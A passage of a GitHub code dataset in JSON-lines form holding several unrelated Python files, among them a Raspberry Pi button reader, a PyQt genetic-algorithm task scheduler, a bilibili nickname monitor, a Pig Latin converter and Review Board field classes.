dryrunBool)\n","repo_name":"cms-tau-pog/TauMLTools","sub_path":"Production/python/crab_tools.py","file_name":"crab_tools.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} {"seq_id":"13855383790","text":"import RPi.GPIO as GPIO\nimport pygame\nimport sys\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n\ndef run():\n\tinput = GPIO.input(4)\n\tif input == True:\n\t\tprint(\"Input is true\")\n\telse:\n\t\tprint(\"Input is false\")\n\nif __name__ == '__main__':\n\tquit = False\n\twhile quit == False:\n\t\trun()\n\t\tevents = pygame.event.get()\n\t\tfor event in events:\n\t\t\tif event.type == pygame.KEYDOWN and event.key == pygame.K_q:\n\t\t\t\tquit=True\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tquit = True\n\n\tpygame.quit()\n\tsys.exit()\n","repo_name":"filtoid/PythonButtonRPi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"8933770506","text":"\n\nimport random\n\nimport sys\nfrom typing import Counter\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nimport plotly.express as px\nimport pandas as pd\nimport numpy\nimport matplotlib.pyplot as plt\n\nclass ViewTask(QMainWindow):\n    MATERIA = ' '\n    PROBABILIDADDESENDENCIA = 0.0\n    PROBABILIDADMUTACION = 0.0\n    PROBABILIDADMUTACIONGEN = 0.0\n    NOMBRE_TAREA = ' '\n    TIEMPO_TAREA = 0\n    LISTATAREAS = []\n    IMPORTANCIATAREA = \"\"\n    CANTIDADTAREA = 0\n    HORASDIA = 0\n    TAREASDIA = 0\n    LISTAJOINPADREHIJO = []\n    GENERACIONES = []\n    DIASENTREGA = 0\n    DIASTRABAJDOS = 0\n    POBLACIONMAXIMA = 0\n    COUNT = 0\n    GENERACIONES = 10\n\n    def __init__(self) -> None:\n        super().__init__()\n        uic.loadUi(\"ui.ui\",self)\n        self.ventanaDos.hide()\n        self.btn_siguiente.clicked.connect(self.agregarDias)\n        self.btn_agregar.clicked.connect(self.agregarTareas)\n        self.btn_siguiente.setEnabled(False)\n        
self.btn_siguiente.clicked.connect(self.iniciarIteraccion)\n self.PROBABILIDADDESENDENCIA = 0.86\n self.PROBABILIDADMUTACION = 0.1\n self.PROBABILIDADMUTACIONGEN = 0.15\n self.POBLACIONMAXIMA = 8\n \n def agregarDias(self):\n print(\"tareas agregadasa\")\n if not self.calcularMaximoDia():\n self.ventanaDos.show()\n\n def validarDatos(self):\n try:\n self.MATERIA = str(self.materia.text())\n self.NOMBRE_TAREA = str(self.nombre_tarea.text())\n self.TIEMPO_TAREA = int(self.tiempo_tarea.text())\n self.HORASDIA = int(self.horas_porDia.text())\n self.TAREASDIA = int(self.tareas_porDia.text())\n self.DIASENTREGA = int(self.dias_de_entrega.text())\n self.DIASTRABAJDOS = int(self.dias_trabajados.text())\n except ValueError:\n print(\"Datos mal ingresados\")\n\n def agregarTareas(self):\n with open(\"prueba.txt\") as archivo:\n for x in archivo.readlines():\n print(x)\n linea = x.split(\" \")\n self.LISTATAREAS.append((\n linea[0],\n linea[1],\n linea[2],\n linea[3].rstrip(\"\\n\")\n ))\n\n # self.validarDatos()\n\n # self.LISTATAREAS.append((\n # self.MATERIA,\n # self.NOMBRE_TAREA,\n # self.TIEMPO_TAREA,\n # self.IMPORTANCIATAREA,\n # self.DIASENTREGA\n # ))\n \n # self.lista_total.addItem(\"Materia: \"+self.MATERIA+\"\\n Nombre-Tarea: \"+str(self.NOMBRE_TAREA)+\"\\n Tiempo: \"+str(self.TIEMPO_TAREA)+\"\\n Importancia-Tarea: \"+str(self.IMPORTANCIATAREA))\n # self.lista_total.addItem(\"----------------------------------------------------\")\n # self.materia.setText(\"\")\n # self.nombre_tarea.setText(\"\")\n # self.tiempo_tarea.setText(\"\")\n print(\"lista\")\n print(self.LISTATAREAS)\n self.btn_siguiente.setEnabled(True)\n def calcularMaximoDia(self):\n status = False\n li = [int(x[3]) for x in self.LISTATAREAS]\n valorMaximo = max(li)\n print(valorMaximo)\n if valorMaximo > int(self.dias_total_trabajo.text()):\n status = True\n else:\n status=False\n\n return status \n\n def iniciarIteraccion(self):\n if not self.calcularMaximoDia():\n listaUltimaGeneracion = []\n listaIndividuosGeneracion = []\n listaIndividuos = self.generarIndividuos()\n for x in range(self.GENERACIONES):\n listaSeleccionIndividuos = self.seleccionIndividuos(listaIndividuos)\n listaCruzaIndividuos = self.cruzaIndividuos(listaSeleccionIndividuos)\n listaMutacionIndividuos = self.mutaTareas(listaCruzaIndividuos)\n listaTareasCal = self.calcularLasMejoresTareas(listaMutacionIndividuos)\n listaIndividuosGeneracion.append(self.calcularMayorPeorPromedio(listaTareasCal))\n listaIndividuos = self.poda(listaTareasCal)\n listaUltimaGeneracion = listaIndividuos\n listaIndividuos = [x[2] for x in listaIndividuos]\n #self.poda()\n self.msjMejorIndividuo.addItem(str(listaUltimaGeneracion[0]))\n self.graficar(listaIndividuosGeneracion)\n self.graficarGantt2(listaUltimaGeneracion)\n else:\n print(\"error de dia\")\n \n def graficarGantt2(self,lista):\n fig, ax = plt.subplots(1,figsize=(16,6))\n print(lista[0][4])\n tareasValidas = lista[0][4]\n print(tareasValidas)\n cont = 0\n cont2 = 0\n listaaux = []\n for i in tareasValidas:\n diasValidos = (int(i[2])/8)\n listaaux.append(cont2)\n cont2 += diasValidos\n\n for y,i in enumerate(tareasValidas):\n print(i)\n diasValidos = (int(i[2])/8)\n ax.barh(i[1]+' '+i[3]+\" \"+str(listaaux[y]),diasValidos,left=cont) \n cont += diasValidos\n ax.set_title(\"Tareas del Individuo\")\n\n for y,i in enumerate(ax.patches):\n print(i)\n plt.text(i.get_x()+0.5, i.get_y()+0.5,\n str(round((listaaux[y]), 2)),\n fontsize=10, fontweight='bold',\n color='black')\n plt.show()\n pass\n\n\n # def 
graficaGantt(self,lista):\n # fig, ax = plt.subplots(1,figsize=(16,6))\n # i = 0\n # numDiaTareas = []\n # print(lista[0][2])\n # tareasValidas = lista[0][2]\n # tareasValidas = [x[3] for x in tareasValidas]\n # nombreTareas = []\n # for j in range(len(tareasValidas)):\n # tareita = tareasValidas[j]\n # tareita = int(tareita)\n # diasTareasValidas = tareasValidas[j] / 8\n # numDiaTareas.append(tareita)\n # nombreValido = lista[0][4][j][1]\n # nombreTareas.append(nombreValido)\n # print(numDiaTareas[j])\n # ax.barh(nombreTareas[j],i-1,left=numDiaTareas[j]) \n # plt.show()\n \n def individuo_unico(self,aux1,aux2):\n unico = True \n for i in aux2:\n if aux1 == i:\n unico = False\n break\n return unico\n\n def generarIndividuos(self):\n print(\"-----Generar Individuo-----\")\n cont = 0\n poblacion = []\n array_individuo = []\n for i in range(int(self.cantidad_tarea_por_materia.text())):\n while cont < len(self.LISTATAREAS):\n num_aleatorio = random.randint(0,len(self.LISTATAREAS)-1)\n if self.individuo_unico(num_aleatorio,array_individuo):\n array_individuo.append(num_aleatorio)\n cont += 1\n cont = 0\n poblacion.append(array_individuo)\n array_individuo = []\n print(poblacion)\n return poblacion\n \n\n def seleccionIndividuos(self,listaIndividuos):\n print(\"--seleccion de paquetes---\")\n listaIndividuosSelecion = []\n self.LISTAJOINPADREHIJO = listaIndividuos\n count = 1\n count2 = 0\n while count < len(listaIndividuos):\n listaIndividuosSelecion.append((listaIndividuos[count2],listaIndividuos[count],random.randint(1,100)/100,random.randint(0,len(self.LISTATAREAS)-1)))\n if count == len(listaIndividuos)-1:\n count2+=1\n count = count2\n count+=1\n print(listaIndividuosSelecion)\n return listaIndividuosSelecion\n\n def cruzaIndividuos(self,listaSeleccionTareas):\n print(\"-------cruza------\")\n listaCruzaIndividuos = []\n listaProbabilidadDesendencia = []\n for x in listaSeleccionTareas:\n if random.randint(1,100)/100 <= self.PROBABILIDADDESENDENCIA:\n listaProbabilidadDesendencia.append(x)\n pass\n for x in listaProbabilidadDesendencia:\n individuosPaquete1 = x[0]\n individuosPaquete2 = x[1]\n corte = x[3]\n listaCruzaIndividuos.append([individuosPaquete1[:corte]+individuosPaquete2[corte:]])\n listaCruzaIndividuos.append([individuosPaquete2[:corte]+individuosPaquete1[corte:]])\n self.eliminarTareasRepetidos(listaCruzaIndividuos)\n \n print(listaCruzaIndividuos)\n return listaCruzaIndividuos\n\n def eliminarTareasRepetidos(self,listaCruzaIndividuos):\n for x in listaCruzaIndividuos:\n individuo1 = x[0]\n listanew2 = [x for x,y in Counter(individuo1).items() if y > 1]\n for p in listanew2:\n individuo1.remove(p)\n self.agregandoLosNuevosValoresIndividuos(individuo1)\n\n def agregandoLosNuevosValoresIndividuos(self,listaIndividuo):\n for x in range(0,len(self.LISTATAREAS)):\n if not x in listaIndividuo:\n listaIndividuo.append(x)\n\n def mutaTareas(self,listaCruzaIndividuos):\n print(\"-------Mutacion-------\")\n listaMutaIndividuo = []\n for x in listaCruzaIndividuos:\n listaMutaIndividuo.append(x[0])\n \n for x in listaMutaIndividuo:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACION:\n for y in x:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACIONGEN:\n x.remove(y)\n rp = random.randint(0,len(x))\n x.insert(rp,y)\n # if random.randint(1,100)/100 <= self.PROBABILIDADMUTACION:\n # self.mutar(x[0])\n # print(listaCruzaIndividuos)\n for x in listaMutaIndividuo:\n self.LISTAJOINPADREHIJO.append(x)\n \n print(self.LISTAJOINPADREHIJO)\n return self.LISTAJOINPADREHIJO\n \n def 
mutar(self,listaCruzaIndividuos):\n for x in listaCruzaIndividuos:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACIONGEN:\n listaCruzaIndividuos.remove(x)\n randoPosicionNumber = random.randint(0,len(listaCruzaIndividuos))\n listaCruzaIndividuos.insert(randoPosicionNumber,x)\n \n pass\n\n def calcularLasMejoresTareas(self,listaMutacionIndividuo):\n print(\"-----calcular mejores tareas----\")\n listaTareas = []\n for i,x in enumerate(listaMutacionIndividuo):\n listaTareas.append(self.calcularTareaPorIndividuo(x,i))\n # pass\n listaTareas.sort(key = lambda tareas: tareas[1],reverse=True)\n \n return listaTareas\n\n def calcularTareaPorIndividuo(self,lista,num):\n listaTareasChidas = []\n totalHrs = 0\n listaHrs = []\n listaTareas = []\n \n for x in lista:\n totalHrs += int(self.LISTATAREAS[x][2])\n listaHrs.append(totalHrs)\n listaTareas.append(self.LISTATAREAS[x])\n for i,x in enumerate(listaHrs):\n hrsTarea = int(listaTareas[i][3])*8\n if x <= hrsTarea:\n listaTareasChidas.append(listaTareas[i])\n\n return (\"Individuo\"+str(num),len(listaTareasChidas),lista,\"Tareas Validas: \",listaTareasChidas)\n \n def calcularMayorPeorPromedio(self,listaIndividuos):\n \n mejorPeorPromedio = []\n mejorPeorPromedio.append(max([x[1] for x in listaIndividuos]))\n mejorPeorPromedio.append(min([x[1] for x in listaIndividuos])) \n mejorPeorPromedio.append(numpy.mean([x[1] for x in listaIndividuos]))\n\n return mejorPeorPromedio\n \n def poda(self,listaMutaIndividuos):\n print(\"-----poda-----\")\n if len(listaMutaIndividuos) > self.POBLACIONMAXIMA:\n listaMutaIndividuos = listaMutaIndividuos[:self.POBLACIONMAXIMA]\n # diferencia = len(listaMutaIndividuos) - self.POBLACIONMAXIMA\n # for x in range(diferencia):\n # listaMutaIndividuos.pop(random.randint(0,len(listaMutaIndividuos)-1))\n listaMutaIndividuos.sort(key = lambda tareas: tareas[1],reverse=True)\n \n self.lista_tarea_2.addItem(f\"----Generacion {self.COUNT+1}----\")\n print(listaMutaIndividuos)\n for x in listaMutaIndividuos:\n self.lista_tarea_2.addItem(str(x))\n # lista = [x[2] for x in listaMutaIndividuos]\n \n self.COUNT+=1\n return listaMutaIndividuos\n \n\n def graficar(self,listaIndividuosGeneracion):\n fig = plt.figure(figsize=(12,7))\n fig.tight_layout()\n plt.subplot(1, 1, 1)\n\n yM = [x[0] for x in listaIndividuosGeneracion]\n yP = [x[1] for x in listaIndividuosGeneracion]\n yPro = [x[2] for x in listaIndividuosGeneracion]\n\n plt.plot([x for x in range(self.GENERACIONES)],yM,label=\"Mejor\")\n plt.plot([x for x in range(self.GENERACIONES)],yP,label=\"Peor\")\n plt.plot([x for x in range(self.GENERACIONES)],yPro,label=\"Promedio\")\n plt.scatter(len(yM)-1,listaIndividuosGeneracion[-1][0],label=f\"Mejor Individuo\",color=\"red\")\n plt.title(\"Comportamiento\") \n plt.legend()\n plt.show()\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n GUI = ViewTask()\n GUI.show()\n sys.exit(app.exec_())\n\n\n\n\n# Compiladores Analizador-Sementico 6 4 \n# Mantenimiento pipeline-aws 12 5 \n# Multimedia unity-2d 11 6\n# Ingles Report-speech 9 1","repo_name":"ozel-byte/todo-app-proyecto-c3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6622866830","text":"import pandas as pd\nimport os\nfrom pandas import DataFrame\nimport sys\nimport seaborn as sns\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# LMS 계측 정보 추출하는 함수\n'''\ndef m_info(rawdata):\n a = 
rawdata.index[rawdata[0].isna()] # find the NA rows (rows 1 and 112)\n    li = rawdata.index[rawdata[0] == 'Linear'] # find the measurement data\n    mea_info = rawdata[a[0] + 1:a[1]]\n    mea_spectrum = rawdata.iloc[li[0]+1:]\n    mea_data = pd.concat(mea_info, mea_spectrum)\n    #m2 = mea_info.drop(mea_info.columns[2:], axis='columns') # measurement information\n    split_words = mea_info[0].str.split(\"\\\\\").str[-1] # this took forever to find haha\n    mea_info[0] = split_words\n    mea_info_modi = mea_info.drop_duplicates([0]).sort_values(by=[0], axis=0) # sort column 0 in ascending order\n    select_info = ['Actual sensitivity', 'Average type', 'Channelgroup', 'DOF id', 'Frequency resolution',\n                   'Function class', 'HW Range', 'Measured quantity', 'Number of averages', 'Number of lines',\n                   'Original project', 'Original section', 'Overlap', 'Spectrum scaling', 'Window type',\n                   'Y axis unit', 'Original run'] # required measurement info - can be modified\n    mea_info_last = mea_info_modi[mea_info_modi[0].isin(select_info)].reset_index(drop=True) # final measurement info\n    return mea_info_last\n\n#def m_data(rawdata):\n'''\n\nrawdata = pd.read_csv('u24a.csv', header=None, encoding='cp949')\n\nnaraw = rawdata.index[rawdata[0].isna()] # find the NA rows (rows 1 and 112)\nli = rawdata.index[rawdata[0] == 'Linear'] # find the measurement data\nmea_info = rawdata[naraw[0] + 1:naraw[1]].T.drop_duplicates().T\nsplit_words = mea_info[0].str.split(\"\\\\\").str[-1] # this took forever to find haha\nmea_info[0] = split_words\nmea_info_modi = mea_info.drop_duplicates([0]).sort_values(by=[0], axis=0) # sort column 0 in ascending order\nselect_info = ['Actual sensitivity', 'Average type', 'Channelgroup', 'DOF id', 'Frequency resolution',\n               'Function class', 'HW Range', 'Measured quantity', 'Number of averages', 'Number of lines',\n               'Original project', 'Original section', 'Overlap', 'Spectrum scaling', 'Window type',\n               'Y axis unit', 'Original run'] # required measurement info - can be modified\n\nmea_info_last = mea_info_modi[mea_info_modi[0].isin(select_info)] # final measurement info\n\nmea_spectrum = rawdata.iloc[li[0] + 1:].T.drop_duplicates().T\nmea_data = pd.concat([mea_info_last, mea_spectrum], ignore_index=True).reset_index(drop=True)\nmea_data.to_csv('u24a_saved.csv',header=False, index=False, encoding='cp949')\nb = mea_data.index[mea_data[0] == 'Original run'] # extract the row index of 'Original run'\nmea_spectrum.columns = mea_data.iloc[b[0],:]\nmea_spectrum = mea_spectrum.set_index('Original run')\nmea_spectrum = mea_spectrum.astype(float)\nfig = plt.figure(figsize=(10,6))\nax = fig.add_subplot(1,1,1)\n\nax.plot(mea_spectrum.index.astype(float), mea_spectrum)\nplt.show()","repo_name":"seongheechoi/10_ETC","sub_path":"01_GUI/vib_import.py","file_name":"vib_import.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"16796777702","text":"\"\"\"Middleware for working with integrations.\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.deprecation import MiddlewareMixin\n\nfrom djblets.integrations.manager import get_integration_managers\n\nif TYPE_CHECKING:\n    from django.http import HttpRequest\n\n\nclass IntegrationsMiddleware(MiddlewareMixin):\n    \"\"\"Middleware to manage integration lifecycles and data.\n\n    Any project making use of\n    :py:class:`~djblets.integrations.manager.IntegrationManager` must include\n    this middleware. 
This will handle multi-process synchronization and cache\n invalidation, which is needed to ensure that settings aren't stale on\n other processes when a configuration is added, edited, or removed.\n \"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n if 'djblets.integrations' not in settings.INSTALLED_APPS:\n raise ImproperlyConfigured(\n 'IntegrationsMiddleware requires djblets.integrations to be '\n 'listed in settings.INSTALLED_APPS.'\n )\n\n super().__init__(*args, **kwargs)\n\n self.check_expiration = not getattr(settings, 'RUNNING_TEST', False)\n\n def process_request(\n self,\n request: HttpRequest,\n ) -> None:\n \"\"\"Process an HTTP request.\n\n This will run through all the integration managers, checking if any\n have expired and ensuring they have the latest state.\n \"\"\"\n if self.check_expiration:\n for integration_manager in get_integration_managers():\n integration_manager.check_expired()\n","repo_name":"djblets/djblets","sub_path":"djblets/integrations/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"56929218","text":"# coding:gbk\n\nimport requests\nimport time\nimport pygame\nfrom bs4 import BeautifulSoup\nfrom builtins import input\n\n\nurl = \"https://space.bilibili.com/\"\n\nmuc = \"dididi.mp3\"\npygame.mixer.init()\nmusicTrack = pygame.mixer.music.load(muc)\n\npage = requests.get(url)\n\nif len(url) == 27:\n UID = input(\"输入监控的UID: \")\n url += UID\n print(\"开始监控...\")\n\npage = requests.get(url)\n\nwhile(page.status_code == 404):\n url = \"https://space.bilibili.com/\"\n UID = input(\"用户不存在重新输入UID: \")\n url += UID\n page = requests.get(url)\n \nsoup = BeautifulSoup(page.content,'html.parser')\noriName = soup.find('title').string[:-35]\n \nwhile True:\n page = requests.get(url)\n\n if (page.status_code == 200):\n \n soup = BeautifulSoup(page.content,'html.parser')\n usrName = soup.find('title').string[:-35]\n print(usrName)\n if(usrName != oriName):\n pygame.mixer.music.play(-1)\n print(\"名字修改了!原来的名字:\"+ oriName)\n time.sleep(10)\n \n elif (page.status_code == 404):\n print(\"!404PAGE!\")\n time.sleep(10)\n \n else:\n print(\"!Wrong!\")\n time.sleep(10)\n ","repo_name":"qdhfsh/bilibiliNicknameMonitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72328279778","text":"# I really, really wanted to do from enum import Enum\n# Alas, transcrypt won't import from the standard library\n\n\nclass AwfulEnum: # I'm so sorry\n def __init__(self):\n self._dict = {getattr(self, func): func for func in dir(self) if not func.startswith(\"__\")}\n\n def __getitem__(self, item):\n return self._dict[item]\n\n\nclass _MessageTypes(AwfulEnum):\n TEXT = 1\n IMAGE = 2\n AUDIBLES = 3\n\n\nMessageTypes = _MessageTypes()\n","repo_name":"python-discord/summer-code-jam-2020","sub_path":"whimsical-woodpeckers/www/src/py/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"15545943838","text":"from PyQt5 import QtWidgets\n\nfrom db.Repository import Repository\nfrom ui.DeleteSampleWin import Ui_MainWindow as dsw\n\n\nclass DeleteSampleModal(QtWidgets.QMainWindow):\n def __init__(self, callbackRegenrate: callable):\n super(DeleteSampleModal, 
\n","repo_name":"python-discord/summer-code-jam-2020","sub_path":"whimsical-woodpeckers/www/src/py/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"}
{"seq_id":"15545943838","text":"from PyQt5 import QtWidgets\n\nfrom db.Repository import Repository\nfrom ui.DeleteSampleWin import Ui_MainWindow as dsw\n\n\nclass DeleteSampleModal(QtWidgets.QMainWindow):\n def __init__(self, callbackRegenrate: callable):\n super(DeleteSampleModal, self).__init__()\n self.callbackRegenrate = callbackRegenrate\n self.dsw = dsw()\n self.dsw.setupUi(self)\n\n self.repo = Repository()\n\n samples = self.repo.getAllSample()\n\n for sample in samples:\n self.dsw.comboBox.addItem(sample.name, sample.uid)\n\n self.dsw.pushButton.clicked.connect(self.deleteSample)\n\n def deleteSample(self):\n uidSample = self.dsw.comboBox.currentData()\n self.repo.delSample(uidSample)\n self.callbackRegenrate()\n self.hide()","repo_name":"OmgProsto/pqt","sub_path":"src/DeleteSampleModal.py","file_name":"DeleteSampleModal.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"10606407134","text":"'''\nName : Deeksha S\nEmail : dsurasan@student.fitchburgstate.edu\nWeek : 5\nDesc : Program to take a string as input and convert it to PigLatin\n'''\nvowels = \"aeiouAEIOU\"\nwhile(True):\n inputString = input(\"Please enter an English word to be translated into PigLatin(You can enter . to exit) : \")\n if(inputString == \".\"): # exit the program if the user inputs a period\n break\n elif(inputString[0] in vowels):\n modifiedString = inputString+\"yay\" #if input string starts with a vowel\n else:\n i = -1\n for vowel in vowels:\n j = inputString.find(vowel)\n if(j >= 0 and (i < 0 or j < i)):\n i = j # keep the earliest vowel position in the word\n if(i>=0):\n modifiedString = inputString[i::]+inputString[0:i]+\"ay\" #if a vowel is found\n else:\n modifiedString = inputString+\"ay\" #if no vowels are found\n print(inputString , \"in PigLatin is : \",modifiedString)\n","repo_name":"DeekshaZ/Python-Assignments","sub_path":"PalindromeAndPigLatin/pigLatin.py","file_name":"pigLatin.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"74926993378","text":"# Forest logging (wycinka lasu)\n\ndef fun(T, n):\n if n < 0:\n return 0\n return max(T[n] + fun(T, n-2), T[n-1] + fun(T, n-3))\n\ndef las(T,n):\n if n < 0:\n return 0 \n return max(las(T,n-2)+T[n],las(T,n-1))\n\ndef las_iteracyjnie(T):\n pom = [0 for i in range(len(T))]\n for i in range(len(T)):\n if i > 2:\n pom[i] = T[i] + max(pom[i-2],pom[i-3])\n else:\n pom[i] = T[i]\n return max(pom[len(T)-1],pom[len(T)-2])\n\nprint(las_iteracyjnie([5,1,2,7,4,2]))","repo_name":"Kasl0/ASD","sub_path":"SEKCJA II/cwiczenia 2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"4592261195","text":"from __future__ import annotations\n\nimport logging\nimport uuid\nfrom itertools import chain\nfrom typing import Any, Dict\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.template.loader import get_template, render_to_string\nfrom django.urls import NoReverseMatch\nfrom django.utils.functional import cached_property\nfrom django.utils.html import escape, format_html, format_html_join\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext_lazy as _\n\nfrom reviewboard.attachments.models import FileAttachment\nfrom reviewboard.diffviewer.diffutils import get_sorted_filediffs\nfrom reviewboard.diffviewer.models import DiffCommit, DiffSet\nfrom reviewboard.reviews.fields import (BaseCommaEditableField,\n BaseEditableField,\n BaseReviewRequestField,\n BaseReviewRequestFieldSet,\n BaseTextAreaField)\nfrom reviewboard.reviews.models import (Group, ReviewRequest,\n ReviewRequestDraft,\n Screenshot)\nfrom reviewboard.scmtools.models import Repository\nfrom 
reviewboard.site.urlresolvers import local_site_reverse\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BuiltinFieldMixin(object):\n \"\"\"Mixin for built-in fields.\n\n This overrides some functions to work with native fields on a\n ReviewRequest or ReviewRequestDraft, rather than working with those\n stored in extra_data.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the field.\n\n Args:\n *args (tuple):\n Positional arguments to pass through to the superclass.\n\n **kwargs (dict):\n Keyword arguments to pass through to the superclass.\n \"\"\"\n super(BuiltinFieldMixin, self).__init__(*args, **kwargs)\n\n if (not hasattr(self.review_request_details, self.field_id) and\n isinstance(self.review_request_details, ReviewRequestDraft)):\n # This field only exists in ReviewRequest, and not in\n # the draft, so we're going to work there instead.\n self.review_request_details = \\\n self.review_request_details.get_review_request()\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n value = getattr(review_request_details, self.field_id)\n\n if isinstance(value, models.Manager):\n value = list(value.all())\n\n return value\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n field = getattr(self.review_request_details, self.field_id)\n\n # ManyRelatedManager cannot be set with a simple assignment, so we need\n # to use .set() for that. Other field types can use setattr.\n if isinstance(field, models.Manager):\n field.set(value)\n else:\n setattr(self.review_request_details, self.field_id, value)\n\n\nclass BuiltinTextAreaFieldMixin(BuiltinFieldMixin):\n \"\"\"Mixin for built-in text area fields.\n\n This will ensure that the text is always rendered in Markdown,\n no matter whether the source text is plain or Markdown. It will\n still escape the text if it's not in Markdown format before\n rendering.\n \"\"\"\n\n def get_data_attributes(self):\n \"\"\"Return any data attributes to include in the element.\n\n Returns:\n dict:\n The data attributes to include in the element.\n \"\"\"\n attrs = super(BuiltinTextAreaFieldMixin, self).get_data_attributes()\n\n # This is already available in the review request state fed to the\n # page, so we don't need it in the data attributes as well.\n attrs.pop('raw-value', None)\n\n return attrs\n\n\nclass ReviewRequestPageDataMixin(object):\n \"\"\"Mixin for internal fields needing access to the page data.\n\n These are used by fields that operate on state generated when creating the\n review request page. The view handling that page makes a lot of queries,\n and stores the results. This mixin allows access to those results,\n preventing additional queries.\n\n The data structure is not meant to be public API, and this mixin should not\n be used by any classes outside this file.\n\n By default, this will not render or handle any value loading or change\n entry recording. 
Subclasses must implement those manually.\n \"\"\"\n\n #: Whether the field should be rendered.\n should_render = False\n\n def __init__(self, review_request_details, data=None, *args, **kwargs):\n \"\"\"Initialize the mixin.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request (or the active draft thereof). In practice\n this will either be a\n :py:class:`reviewboard.reviews.models.ReviewRequest` or a\n :py:class:`reviewboard.reviews.models.ReviewRequestDraft`.\n\n data (reviewboard.reviews.detail.ReviewRequestPageData):\n The data already queried for the review request page.\n\n *args (tuple):\n Additional positional arguments.\n\n **kwargs (dict):\n Additional keyword arguments.\n \"\"\"\n super(ReviewRequestPageDataMixin, self).__init__(\n review_request_details, *args, **kwargs)\n\n self.data = data\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return None\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n pass\n\n\nclass BaseCaptionsField(ReviewRequestPageDataMixin, BaseReviewRequestField):\n \"\"\"Base class for rendering captions for attachments.\n\n This serves as a base for FileAttachmentCaptionsField and\n ScreenshotCaptionsField. It provides the base rendering and handling\n for caption changes on file attachments or screenshots.\n \"\"\"\n\n obj_map_attr = None\n caption_object_field = None\n\n change_entry_renders_inline = False\n\n def render_change_entry_html(self, info):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n unicode:\n The HTML representation of the change entry.\n \"\"\"\n render_item = super(BaseCaptionsField, self).render_change_entry_html\n obj_map = getattr(self.data, self.obj_map_attr)\n\n s = ['<table>']\n\n for id_str, caption in info.items():\n obj = obj_map[int(id_str)]\n\n s.append(format_html(\n '<tr>'\n ' <td><a href=\"{url}\">{filename}</a>:</td>'\n ' <td>{caption}</td>'\n '</tr>',\n url=obj.get_absolute_url(),\n filename=obj.filename,\n caption=mark_safe(render_item(caption))))\n\n s.append('</table>')\n\n return ''.join(s)
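\n\n # NOTE (illustrative, not in the original source): format_html() escapes\n # each argument it interpolates, which is why the pre-rendered caption\n # fragment above is wrapped in mark_safe() -- otherwise its markup would\n # be double-escaped.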
